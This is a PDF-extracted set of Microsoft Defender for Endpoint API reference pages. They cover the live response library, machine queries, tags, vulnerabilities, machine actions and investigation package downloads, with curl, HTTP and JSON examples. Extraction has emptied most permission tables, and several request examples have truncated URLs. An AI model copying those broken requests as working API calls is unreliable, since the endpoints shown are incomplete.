"parametersDescription": "test"
},
{
"fileName": "script.sh",
"sha256":
"d0f3e3b0641dbf88ee39c822516e81a909d1d06d22341dd9b1f12aa5e5c027a2",
"description": null,
"creationTime": "2018-10-24T11:15:35.3688259Z",
"createdBy": "username",
"hasParameters": false
},
{
"fileName": "memdump.exe",
"sha256":
"fa70b87730290c0d30fe255d1dfb65de82f96286ebfeeb1d88ed3cc831329825",
"description": "Process memory dump",
"creationTime": "2018-10-24T10:54:23.2009016Z",
"createdBy": "admin",
"hasParameters": false
}
]
}
Related article
Run live response
 Tip
Feedback

Upload files to the live response library
Article • 09/27/2023
Applies to:
） Important

７ Note
 Tip
API description
Upload file to live response library.
Limitations
1. File max size limitation is 20MB.
Permissions
ﾉ Expand table
HTTP request
Upload
HTTP
POST https://api.securitycenter.microsoft.com/api/libraryfiles
Request headers
ﾉ Expand table
Authorization String Bearer<token>. Required.
Content-Type string multipart/form-data. Required.
Request body
In the request body, supply a form-data object with the following parameters:
ﾉ Expand table
File File The file to be uploaded to live response library.Required

content
Description String Description of the file.
ParametersDescription String (Optional) Parameters required for the script to run. Default
value is an empty string.
OverrideIfExists Boolean (Optional) Whether to override the file if it already exists.

Default value is an empty string.
Response
If successful, this method returns 200 - OK response code and the uploaded live
response library entity in the response body.
If not successful: this method returns 400 - Bad Request. Bad request usually
Example
Request
Here is an example of the request using curl.
CURL
curl -X POST https://api.securitycenter.microsoft.com/api/libraryfiles -H

"Authorization: Bearer \$token" -F "file=\@mdatp1.png" -F
"ParametersDescription=test"
-F "HasParameters=true" -F "OverrideIfExists=true" -F "Description=test
description"
Related topic
Run live response
 Tip
Feedback

Delete a file from the live response
library
Article • 09/27/2023
Applies to:
） Important

７ Note
 Tip
API description
Delete a file from live response library.
Limitations
Permissions
ﾉ Expand table
HTTP request
DELETE https://api.securitycenter.microsoft.com/api/libraryfiles/{fileName}
Request headers
ﾉ Expand table
Request body
Empty
Response
If file exists in library and deleted successfully 204 No Content.
If specified file name was not found 404 Not Found.
Example
Request
HTTP
DELETE https://api.securitycenter.microsoft.com/api/libraryfiles/script1.ps1
Related topic
Run live response
 Tip
Feedback

Machine resource type
Article • 02/23/2024
Applies to:

７ Note
 Tip
） Important

Methods
ﾉ Expand table
List machines machine collection List set of machine entities in the org.
Method
Get machine Return Type
machine Description
Get a machine by its identity.
Get logged on users user collection Get the set of User that logged on to the
machine.
Get related alerts alert collection Get the set of alert entities that were raised on
the machine.
Get installed software software collection Retrieves a collection of installed software

related to a given machine ID.
Get discovered vulnerability Retrieves a collection of discovered

vulnerabilities collection vulnerabilities related to a given machine ID.
Get security recommendation Retrieves a collection of security

recommendations collection recommendations related to a given machine
ID.
Add or Remove machine Add or Remove tag to a specific machine.

machine tags
Find machines by IP machine collection Find machines seen with IP.
Find machines by tag machine collection Find machines by Tag.
Get missing KBs KB collection Get a list of missing KBs associated with the
machine ID
Set device value machine collection Set the value of a device.
Update machine machine collection Get the update status of a machine.
Properties
ﾉ Expand table
id String machine identity.
computerDnsName String machine fully qualified name.
firstSeen DateTimeOffset First date and time where the machine was observed
by Microsoft Defender for Endpoint.
lastSeen DateTimeOffset Time and date of the last received full device report.
A device typically sends a full report every 24 hours.
NOTE: This property doesn't correspond to the last
seen value in the UI. It pertains to the last device

update.
osPlatform String Operating system platform.
onboardingstatus String Status of machine onboarding. Possible values are:

onboarded , CanBeOnboarded , Unsupported , and
InsufficientInfo .
osProcessor String Operating system processor. Use osArchitecture

property instead.
version String Operating system Version.
osBuild Nullable long Operating system build number.
lastIpAddress String Last IP on local NIC on the machine.
lastExternalIpAddress String Last IP through which the machine accessed the

internet.
healthStatus Enum machine health status. Possible values are: Active ,

Inactive , ImpairedCommunication , NoSensorData ,
NoSensorDataImpairedCommunication , and Unknown .
rbacGroupName String Machine group Name.
rbacGroupId String Machine group ID.
riskScore Nullable Enum Risk score as evaluated by Microsoft Defender for

Endpoint. Possible values are: None , Informational ,
Low , Medium , and High .
aadDeviceId Nullable Microsoft Entra Device ID (when machine is Microsoft

representation Entra joined).
Guid
machineTags String collection Set of machine tags.
exposureLevel Nullable Enum Exposure level as evaluated by Microsoft Defender for

Endpoint. Possible values are: None , Low , Medium , and
High .
deviceValue Nullable Enum The value of the device. Possible values are: Normal ,
Low , and High .
ipAddresses IpAddress Set of IpAddress objects. See Get machines API.

collection
osArchitecture String Operating system architecture. Possible values are:

32-bit , 64-bit . Use this property instead of
osProcessor.
 Tip
Feedback

List machines API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Machines that have communicated with Microsoft Defender for
Endpoint cloud.
The OData's $filter query is supported on: computerDnsName , id , version ,

deviceValue , aadDeviceId , machineTags , lastSeen , exposureLevel , onboardingStatus ,
lastIpAddress , healthStatus , osPlatform , riskScore and rbacGroupId .

$skip See examples at OData queries with Defender for Endpoint
Limitations
You can get devices last seen according to your configured retention period.
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
Response will include only devices, that the user have access to, based on
groups)
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/machines
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and machines exists - 200 OK with list of machine entities in the body. If no
recent machines - 404 Not Found.
Example
Request example
HTTP
GET https://api.securitycenter.microsoft.com/api/machines
Response example
HTTP
HTTP/1.1 200 OK
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Machines",
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"version": "1709",
"lastIpAddress": "172.17.230.209",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
"exposureLevel": "Medium",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
...
]
}
Related articles
 Tip
Feedback

Get machine by ID API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves specific Machine by its device ID or computer name.
Limitations
1. You can get devices last seen according to your configured retention policy.
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
HTTP request
HTTP
GET /api/machines/{id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and device exists - 200 OK with the machine entity in the body. If machine
with the specified ID wasn't found - 404 Not Found.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c29
32e418702b84d0cc07
Response example
HTTP
HTTP/1.1 200 OK
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Machine",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"version": "1709",
"lastIpAddress": "172.17.230.209",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
"exposureLevel": "Medium",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
 Tip
Feedback

Get machine logon users API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of logged on users on a specific device.
Limitations
period.
Permissions
ﾉ Expand table
Application User.Read.All 'Read user profiles'
Delegated (work or school account) User.Read.All 'Read user profiles'
７ Note
The user needs to have at least the following role permission: 'View Data'. For
more information, see Create and manage roles.
Response will include users only if the device is visible to the user, based on
device group settings. For more information, see Create and manage device
groups.
HTTP request
HTTP
GET /api/machines/{id}/logonusers
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and device exists - 200 OK with list of user entities in the body. If device
wasn't found - 404 Not Found.
Example
Request
HTTP
GET
32e418702b84d0cc07/logonusers
Response
HTTP
HTTP/1.1 200 OK
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Users",
"value": [
{
"id": "contoso\\user1",
"accountName": "user1",
"accountDomain": "contoso",
"firstSeen": "2019-12-18T08:02:54Z",
"lastSeen": "2020-01-06T08:01:48Z",
"logonTypes": "Interactive",
"isDomainAdmin": true,
"isOnlyNetworkUser": false
},
...
]
}
 Tip
Feedback

Get machine related alerts API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves all Alerts related to a specific device.
Limitations
1. You can query on devices last updated according to your configured retention
period.
ﾉ Expand table
７ Note
more information about permissions, see Create and manage roles.
The user needs to have access to the device, based on device group settings.
For more information about device group settings, see Create and manage
device groups.
HTTP request
HTTP
GET /api/machines/{id}/alerts
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and device exists: 200 OK with list of alert entities in the body. If device was
not found: 404 Not Found.
 Tip
Feedback

Get installed software
Article • 09/27/2023
Applies to:


７ Note
 Tip
） Important

Retrieves a collection of installed software related to a given device ID.

Permissions
ﾉ Expand table

Software information'

account) Software information'
HTTP request
HTTP
GET /api/machines/{machineId}/software
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the installed software information in the
body.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf4
4207c4006ed7cc4501/software
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Software",
"value": [
{
"id": "microsoft-_-internet_explorer",
"name": "internet_explorer",
"vendor": "microsoft",
"weaknesses": 67,
"publicExploit": true,
"activeAlert": false,
"exposedMachines": 42115,
"impactScore": 46.2037163
}
]
}
See also
Defender Vulnerability Management software inventory
 Tip
Feedback

Get discovered vulnerabilities
Article • 11/15/2023
Applies to:


７ Note
 Tip
API description
Retrieves a collection of discovered vulnerabilities related to a given device ID.
Limitations
Permissions
ﾉ Expand table


HTTP request
HTTP
GET /api/machines/{machineId}/vulnerabilities
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the discovered vulnerability information in
the body.
Example
Request
HTTP
GET
4207c4006ed7cc4501/vulnerabilities
Response
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics
.Contracts.PublicAPI.PublicVulnerabilityDto)",
"value": [
{
"id": "CVE-2019-1348",
"name": "CVE-2019-1348",
"description": "Git could allow a remote attacker to bypass
security restrictions, caused by a flaw in the --export-marks option of git
fast-import. By persuading a victim to import specially-crafted content, an
attacker could exploit this vulnerability to overwrite arbitrary paths.",
"cvssV3": 4.3,
"publishedOn": "2019-12-13T00:00:00Z",
"updatedOn": "2019-12-13T00:00:00Z",
"publicExploit": false,
"exploitVerified": false,
"exploitInKit": false,
"exploitTypes": [],
"exploitUris": []
}
]
}
See also
 Tip
Feedback

Get security recommendations
Article • 09/27/2023
Applies to:


７ Note
 Tip
） Important

Retrieves a collection of security recommendations related to a given device ID.

Permissions
ﾉ Expand table
Application SecurityRecommendation.Read.All 'Read Threat and Vulnerability

Management security
recommendation information'
Delegated (work or SecurityRecommendation.Read 'Read Threat and Vulnerability

school account) Management security
HTTP request
HTTP
GET /api/machines/{machineId}/recommendations
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK with the security recommendations in the
body.
Example
Request example
HTTP
GET
4207c4006ed7cc4501/recommendations
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
"value": [
{
"id": "va-_-git-scm-_-git",
"productName": "git",
"recommendationName": "Update Git to version 2.24.1.2",
"weaknesses": 3,
"vendor": "git-scm",
"recommendedVersion": "2.24.1.2",
"recommendationCategory": "Application",
"subCategory": "",
"severityScore": 0,
"associatedThreats": [],
"remediationType": "Update",
"status": "Active",
"configScoreImpact": 0,
"exposureImpact": 0,
"totalMachineCount": 0,
"exposedMachinesCount": 1,
"nonProductivityImpactedAssets": 0,
"relatedComponent": "Git"
},
...
}
Related topics
Defender Vulnerability Management security recommendation
 Tip
Feedback

Add or remove a tag for a machine
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Adds or removes a tag for a specific Machine.
Limitations
1. You can post on machines last seen according to your configured retention period.
Permissions
ﾉ Expand table

information'

account)
７ Note
The user needs to have at least the following role permission: 'Manage
security setting'. For more (See Create and manage roles for more
information).
The user needs to have access to the machine, based on machine group
settings (See Create and manage machine groups for more information).
HTTP request
HTTP
POST https://api.securitycenter.microsoft.com/api/machines/{id}/tags
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Value String The tag name. Required.
Action Enum Add or Remove. Allowed values are: 'Add' or 'Remove'. Required.
Response
If successful, this method returns 200 - Ok response code and the updated Machine in
the response body.
Example Request
Here is an example of a request that adds a machine tag.
HTTP
POST
32e418702b84d0cc07/tags
JSON
{
"Value" : "test Tag 2",
"Action": "Add"
}
To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.
 Tip
Feedback
Add or remove a tag for multiple
machines
Article • 02/22/2024
Applies to:

７ Note
 Tip
API description
Adds or removes a tag for the specified set of machines.
Limitations
1. You can post on machines last seen according to your configured retention period.
3. We can add or remove a tag for up to 500 machines per API call.
Permissions
ﾉ Expand table

information'

account)
７ Note
security setting'. For more information, see Create and manage roles.
settings (See Create and manage machine groups for more information).
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMulti
pleMachines
Request headers
ﾉ Expand table
Request body
ﾉ Expand table
Value String The tag name. Required.
Action Enum Add or Remove. Allowed values are: 'Add' or 'Remove'. Required.
MachineIds List (String) List of machine IDs to update. Required.
Response
If successful, this method returns 200 - Ok response code and the updated machines in
the response body.
Example Request
Here's an example of a request that adds a tag to multiple machines.
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMulti
pleMachines
JSON
{
"Value" : "Tag",
"Action": "Add",
"MachineIds": ["34e83ca3feea4dae2353006ba389262c033a025e",
"2a398439b4975924e87a65943972bc702469b329",
"a610c00c65fdf79960cc0077d9d8c569d23f09a5"]
}
To remove machine tags, set the Action to 'Remove' instead of 'Add' in the request
body.
 Tip
Feedback

Find devices by internal IP API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Find Machines seen with the requested internal IP in the time range of 15 minutes prior
and after a given timestamp.
Limitations
1. The given timestamp must be in the past 30 days.
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
Response will include only devices that the user have access to based on
groups)
groups)
HTTP request
HTTP
GET /api/machines/findbyip(ip='{IP}',timestamp={TimeStamp})
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful - 200 OK with list of the machines in the response body. If the timestamp
isn't in the past 30 days - 400 Bad Request.
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/findbyip(ip='10.248.24
0.38',timestamp=2019-09-22T08:44:05Z)
 Tip
Feedback

Find device information by internal IP
API
Article • 09/27/2023
Applies to:

７ Note
 Tip
Find a device by internal IP.
７ Note
The timestamp must be within the last 30 days.
Permissions
ﾉ Expand table
Application Machine.ReadWrite.All 'Read and write all machine information'
HTTP request
HTTP
GET /api/machines/find(timestamp={time},key={IP})
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and machine exists - 200 OK. If no machine found - 404 Not Found.
Example
Request example
HTTP
GET
https://graph.microsoft.com/testwdatppreview/machines/find(timestamp=2018-
06-19T10:00:00Z,key='10.166.93.61')
Response example
The response will return a list of all devices that reported this IP address within 16
minutes prior and after the timestamp.
JSON
HTTP/1.1 200 OK
{
"@odata.context":
"https://graph.microsoft.com/testwdatppreview/$metadata#Machines",
"value": [
{
"id": "04c99d46599f078f1c3da3783cf5b95f01ac61bb",
"computerDnsName": "",
"firstSeen": "2017-07-06T01:25:04.9480498Z",
...
}
 Tip
Feedback

Find devices by tag API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Find Machines by Tag.
startswith query is supported.
Limitations
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
groups)
groups)
HTTP request
HTTP
GET /api/machines/findbytag?tag={tag}&useStartsWithFilter={true/false}
Request headers
ﾉ Expand table

ﾉ Expand table
tag String The tag name. Required.
useStartsWithFilter Boolean When set to true, the search finds all devices with tag name that
starts with the given tag in the query. Defaults to false. Optional.
Request body
Empty
Response
If successful - 200 OK with list of the machines in the response body.
Example
Request
HTTP
GET https://api.securitycenter.microsoft.com/api/machines/findbytag?
tag=testTag&useStartsWithFilter=true
 Tip
Feedback

Get missing KBs by device ID
Article • 09/27/2023
Applies to:


７ Note
 Tip
Retrieves missing KBs (security updates) by device ID
HTTP request
HTTP
GET /api/machines/{machineId}/getmissingkbs
Permissions
The following permission is required to call this API. To learn more, including how to
choose permissions, see Use Microsoft Defender for Endpoint APIs.
ﾉ Expand table
Permission Permission Permission display name

type
Application Software.Read.All 'Read Threat and Vulnerability Management Software

information'
Request header
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200 OK, with the specified device missing kb data in
the body.
Example
Request
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/2339ad14a01bd0299afb93
dfa2550136057bff96/getmissingkbs
Response
JSON
{
"@odata.context":
.windowsDefenderATP.api.PublicProductFixDto)",
"value": [
{
"id": "4540673",
"name": "March 2020 Security Updates",
"productsNames": [
"windows_10",
"edge",
"internet_explorer"
],
"url":
"https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540673",
"machineMissedOn": 1,
"cveAddressed": 97
}
]
}
Related topics
 Tip
Feedback
Set device value API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Set the device value of a specific Machine.
See assign device values for more information.
Limitations
1. You can post on devices last seen according to your configured retention period.
Permissions
ﾉ Expand table

information'

account)
７ Note
security setting'. For more (See Create and manage roles for more
information)
settings (See Create and manage machine groups for more information)
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/{machineId}/setDeviceV
alue
Request headers
ﾉ Expand table

Request body
ﾉ Expand table
DeviceValue Enum Device value. Allowed values are: 'Normal', 'Low' and 'High'. Required.
Response
If successful, this method returns 200 - Ok response code and the updated Machine in
the response body.
Example
Request
Here is an example of a request that adds machine tag.
HTTP
POST
32e418702b84d0cc07/setDeviceValue
JSON
{
"DeviceValue" : "High"
}
 Tip
Feedback

Update machine
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Updates properties of existing Machine.
Updatable properties are: machineTags and deviceValue .
Limitations
1. You can update machines that are available in the API.
2. Update machine only appends tags to the tag collection. If tags exist, they must be
included in the tags collection in the body.
Permissions
ﾉ Expand table
Application Machine.ReadWrite.All 'Read and write machine information for

all machines'

account)
７ Note
investigation'. For more information, see Create and manage roles.
device groups.
HTTP request
HTTP
PATCH /api/machines/{machineId}
Request headers
ﾉ Expand table

Request body
In the request body, supply the values for the relevant fields that should be updated.
For best performance, you shouldn't include existing values that haven't change.
ﾉ Expand table
machineTags String Set of machine tags.

collection
deviceValue Nullable Enum The value of the device. Possible values are: 'Normal', 'Low' and
'High'.
Response
If successful, this method returns 200 OK, and the machine entity in the response body
with the updated properties.
If machine tags collection in body doesn't contain existing machine tags - replaces all
tags with the tags provided in the request body.
If machine with the specified ID wasn't found - 404 Not Found.
Example
Request
HTTP
PATCH https://api.securitycenter.microsoft.com/api/machines/{machineId}
JSON
{
"machineTags": [
"Demo Device",
"Generic User Machine - Attack Source",
"Windows 10" "Windows11",
"Windows Insider - Fast"
]
}
 Tip
Feedback

MachineAction resource type
Article • 02/23/2024
Applies to:

７ Note
 Tip
For more information, see Response Actions.
ﾉ Expand table
List MachineActions Machine List Machine Action entities.

Action
Get MachineAction Machine Get a single Machine Action entity.

Action
Collect investigation Machine Collect investigation package from a machine.

package Action
Get investigation package Machine Get URI for downloading the investigation package.
SAS URI Action
Isolate machine Machine Isolate machine from network.

Action
Release machine from Machine Release machine from Isolation.

isolation Action
Restrict app execution Machine Restrict application execution.

Action
Remove app restriction Machine Remove application execution restriction.

Action
Run antivirus scan Machine Run an AV scan using Windows Defender (when
Action applicable).
Offboard machine Machine Offboard machine from Microsoft Defender for

Action Endpoint.
Stop and quarantine file Machine Stop execution of a file on a machine and delete it.
Action
Run live response Machine Runs a sequence of live response commands on a

Action device
Get live response result URL entity Retrieves specific live response command result
download link by its index.
Cancel machine action Machine Cancel an active machine action.

Action
Properties
ﾉ Expand table
ID Guid Identity of the Machine Action entity.
type Enum Type of the action. Possible values are:

RunAntiVirusScan , Offboard , LiveResponse ,
CollectInvestigationPackage , Isolate , Unisolate ,
StopAndQuarantineFile , RestrictCodeExecution , and
UnrestrictCodeExecution .
scope string Scope of the action. Full or Selective for Isolation,

Quick or Full for antivirus scan.
requestor String Identity of the person that executed the action.
externalID String Id the customer can submit in the request for

custom correlation.
requestSource string The name of the user/application that submitted the

action.
commands array Commands to run. Allowed values are PutFile,

RunScript, GetFile.
cancellationRequestor String Identity of the person that canceled the action.
requestorComment String Comment that was written when issuing the action.
cancellationComment String Comment that was written when canceling the

action.
status Enum Current status of the command. Possible values are:

Pending , InProgress , Succeeded , Failed , TimeOut ,
and Cancelled .
machineId String ID of the machine on which the action was

executed.
computerDnsName String Name of the machine on which the action was

executed.
creationDateTimeUtc DateTimeOffset The date and time when the action was created.
cancellationDateTimeUtc DateTimeOffset The date and time when the action was canceled.
lastUpdateDateTimeUtc DateTimeOffset The last date and time when the action status was
updated.
title String Machine action title.
relatedFileInfo Class Contains two Properties. string fileIdentifier ,

Enum fileIdentifierType with the possible values:
Sha1 , Sha256 , and Md5 .
Json representation
JSON
{
"id": "5382f7ea-7557-4ab7-9782-d50480024a4e",
"type": "Isolate",
"scope": "Selective",
"requestor": "Analyst@TestPrd.onmicrosoft.com",
"requestorComment": "test for docs",
"status": "Succeeded",
"machineId": "7b1f4967d9728e5aa3c06a9e617a22a4a5a17378",
"computerDnsName": "desktop-test",
"creationDateTimeUtc": "2019-01-02T14:39:38.2262283Z",
"lastUpdateDateTimeUtc": "2019-01-02T14:40:44.6596267Z",
"relatedFileInfo": null
}
 Tip
Feedback

List MachineActions API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves a collection of Machine Actions.
The OData's $filter query is supported on: id , status , machineId , type , requestor ,
and creationDateTimeUtc properties.
$skip
See examples at OData queries with Microsoft Defender for Endpoint

Limitations
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with a collection of
machineAction entities.
Example 1
Example 1 request
Here is an example of the request on an organization that has three MachineActions.
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions
Example 1 response
JSON
HTTP/1.1 200 Ok
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
"value": [
{
"id": "69dc3630-1ccc-4342-acf3-35286eec741d",
"type": "CollectInvestigationPackage",
"scope": null,
"requestor": "Analyst@contoso.com",
"requestorComment": "test",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"computerDnsName": "desktop-39g9tgl",
"lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
},
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"scope": "Full",
"requestorComment": "Check machine for viruses due to alert
3212",
},
{
"id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
"type": "StopAndQuarantineFile",
"scope": null,
"relatedFileInfo": {
"fileIdentifier":
"a0c659857ccbe457fdaf5fe21d54efdcbf6f6508",
"fileIdentifierType": "Sha1"
}
}
]
}
Example 2
Example 2 request
Here is an example of a request that filters the MachineActions by machine ID and
shows the latest two MachineActions.
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions?
$filter=machineId eq 'f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f'&$top=2
Example 2 response
JSON
HTTP/1.1 200 Ok
{
"@odata.context":
"value": [
{
"id": "69dc3630-1ccc-4342-acf3-35286eec741d",
"type": "CollectInvestigationPackage",
"scope": null,
},
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"scope": "Full",
3212",
}
]
}
Related topics
 Tip
Feedback

Get machineAction API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves specific Machine Action by its ID.
Limitations
Permissions
ﾉ Expand table

information'

account)

account)
７ Note
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions/{id}
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with a Machine Action entity. If
machine action entity with the specified ID wasn't found - 404 Not Found.
Example
Example request
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions/2e9da30d-
27f6-4208-81f2-9cd3d67893ba
Response example
JSON
HTTP/1.1 200 Ok
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineActions/$enti
ty",
"id": "5382f7ea-7557-4ab7-9782-d50480024a4e",
"type": "Isolate",
"scope": "Selective",
"requestor": "Analyst@TestPrd.onmicrosoft.com",
"requestorComment": "test for docs",
"machineId": "7b1f4967d9728e5aa3c06a9e617a22a4a5a17378",
"computerDnsName": "desktop-test",
}
 Tip
Feedback

Collect investigation package API
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Collect investigation package from a device.
Limitations
） Important
These response actions are only available for devices on Windows 10, version
1703 or later, and on Windows 11.
Permissions
ﾉ Expand table
Application Machine.CollectForensics 'Collect forensics'
Delegated (work or school account) Machine.CollectForensics 'Collect forensics'
７ Note
Investigation' (See Create and manage roles for more information)
HTTP request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/{id}/collectInvestigat
ionPackage
Request headers
ﾉ Expand table

Request body
ﾉ Expand table
Response
If successful, this method returns 201 - Created response code and Machine Action in
the response body. If a collection is already running, this returns 400 Bad Request.
Example
Request
HTTP
POST
https://api.securitycenter.microsoft.com/api/machines/fb9ab6be3965095a09c057
be7c90f0a2/collectInvestigationPackage
JSON
{
"Comment": "Collect forensics due to alert 1234"
}
 Tip
Feedback

Get package SAS URI API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Get a URI that allows downloading of an Investigation package.
） Important
These actions are only available for devices on Windows 10, version 1703 or
later, and on Windows 11.
Limitations
Permissions
how to choose permissions, see Access the Microsoft Defender for Endpoint APIs
ﾉ Expand table
Application Machine.Read.All ''Read all machine profiles''
Application "Machine.ReadWrite.All 'Read and write all machine

information'
Delegated (work or school Machine.CollectForensics 'Collect forensics'

account)
７ Note
Investigation' (For more information, see Create and manage roles)
(For more information, see Create and manage device groups)
HTTP request
HTTP
GET https://api.securitycenter.microsoft.com/api/machineactions/{machine
action id}/getPackageUri
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful, this method returns 200, Ok response code with object that holds the link
to the package in the "value" parameter. This link is valid for a short time and should be
used immediately for downloading the package to a local storage. If the machine action
for the collection exists but isn't complete, this returns 404 Not Found.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/machineactions/7327b54fd718525c
bca07dacde913b5ac3c85673/GetPackageUri
Response example
JSON
HTTP/1.1 200 Ok
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Edm.String",
"value": "\"https://userrequests-
us.securitycenter.windows.com:443/safedownload/WDATP_Investigation_Package.z
ip?
token=gbDyj7y%2fbWGAZjn2sFiZXlliBTXOCVG7yiJ6mXNaQ9pLByC2Wxeno9mENsPFP3xMk5l%
2bZiJXjLvqAyNEzUNROxoM2I1er9dxzfVeBsxSmclJjPsAx%2btiNyxSz1Ax%2b5jaT5cL5bZg%2
b8wgbwY9urXbTpGjAKh6FB1e%2b0ypcWkPm8UkfOwsmtC%2biZJ2%2bPqnkkeQk7SKMNoAvmh9%2
fcqDIPKXGIBjMa0D9auzypOqd8bQXp7p2BnLSH136BxST8n9IHR4PILvRjAYW9kvtHkBpBitfydA
sUW4g2oDZSPN3kCLBOoo1C4w4Lkc9Bc3GNU2IW6dfB7SHcp7G9p4BDkeJl3VuDs6esCaeBorpn9F
KJ%2fXo7o9pdcI0hUPZ6Ds9hiPpwPUtz5J29CBE3QAopCK%2fsWlf6OW2WyXsrNRSnF1tVE5H3wX
pREzuhD7S4AIA3OIEZKzC4jIPLeMu%2bazZU9xGwuc3gICOaokbwMJiZTqcUuK%2fV9YdBdjdg8w
J16NDU96Pl6%2fgew2KYuk6Wo7ZuHotgHI1abcsvdlpe4AvixDbqcRJthsg2PpLRaFLm5av44UGk
eK6TJpFvxUn%2f9fg6Zk5yM1KUTHb8XGmutoCM8U9er6AzXZlY0gGc3D3bQOg41EJZkEZLyUEbk1
hXJB36ku2%2bW01cG71t7MxMBYz7%2bdXobxpdo%3d%3bRWS%2bCeoDfTyDcfH5pkCg6hYDmCOPr
%2fHYQuaUWUBNVnXURYkdyOzVHqp%2fe%2f1BNyPdVoVkpQHpz1pPS3b5g9h7IMmNKCk5gFq5m2n
Px6kk9EYtzx8Ndoa2m9Yj%2bSaf8zIFke86YnfQL4AYewsnQNJJh4wc%2bXxGlBq7axDcoiOdX91
rKzVicH3GSBkFoLFAKoegWWsF%2fEDZcVpF%2fXUA1K8HvB6dwyfy4y0sAqnNPxYTQ97mG7yHhxP
t4Pe9YF2UPPAJVuEf8LNlQ%2bWHC9%2f7msF6UUI4%2fca%2ftpjFs%2fSNeRE8%2fyQj21TI8YT
F1SowvaJuDc1ivEoeopNNGG%2bGI%2fX0SckaVxU9Hdkh0zbydSlT5SZwbSwescs0IpzECitBbaL
Uz4aT8KTs8T0lvx8D7Te3wVsKAJ1r3iFMQZrlk%2bS1WW8rvac7oHRx2HKURn1v7fDIQWgJr9aNs
NlFz4fLJ50T2qSHuuepkLVbe93Va072aMGhvr09WVKoTpAf1j2bcFZZU6Za5PxI32mr0k90FgiYF
J1F%2f1vRDrGwvWVWUkR3Z33m4g0gHa52W1FMxQY0TJIwbovD6FaSNDx7xhKZSd5IJ7r6P91Gez4
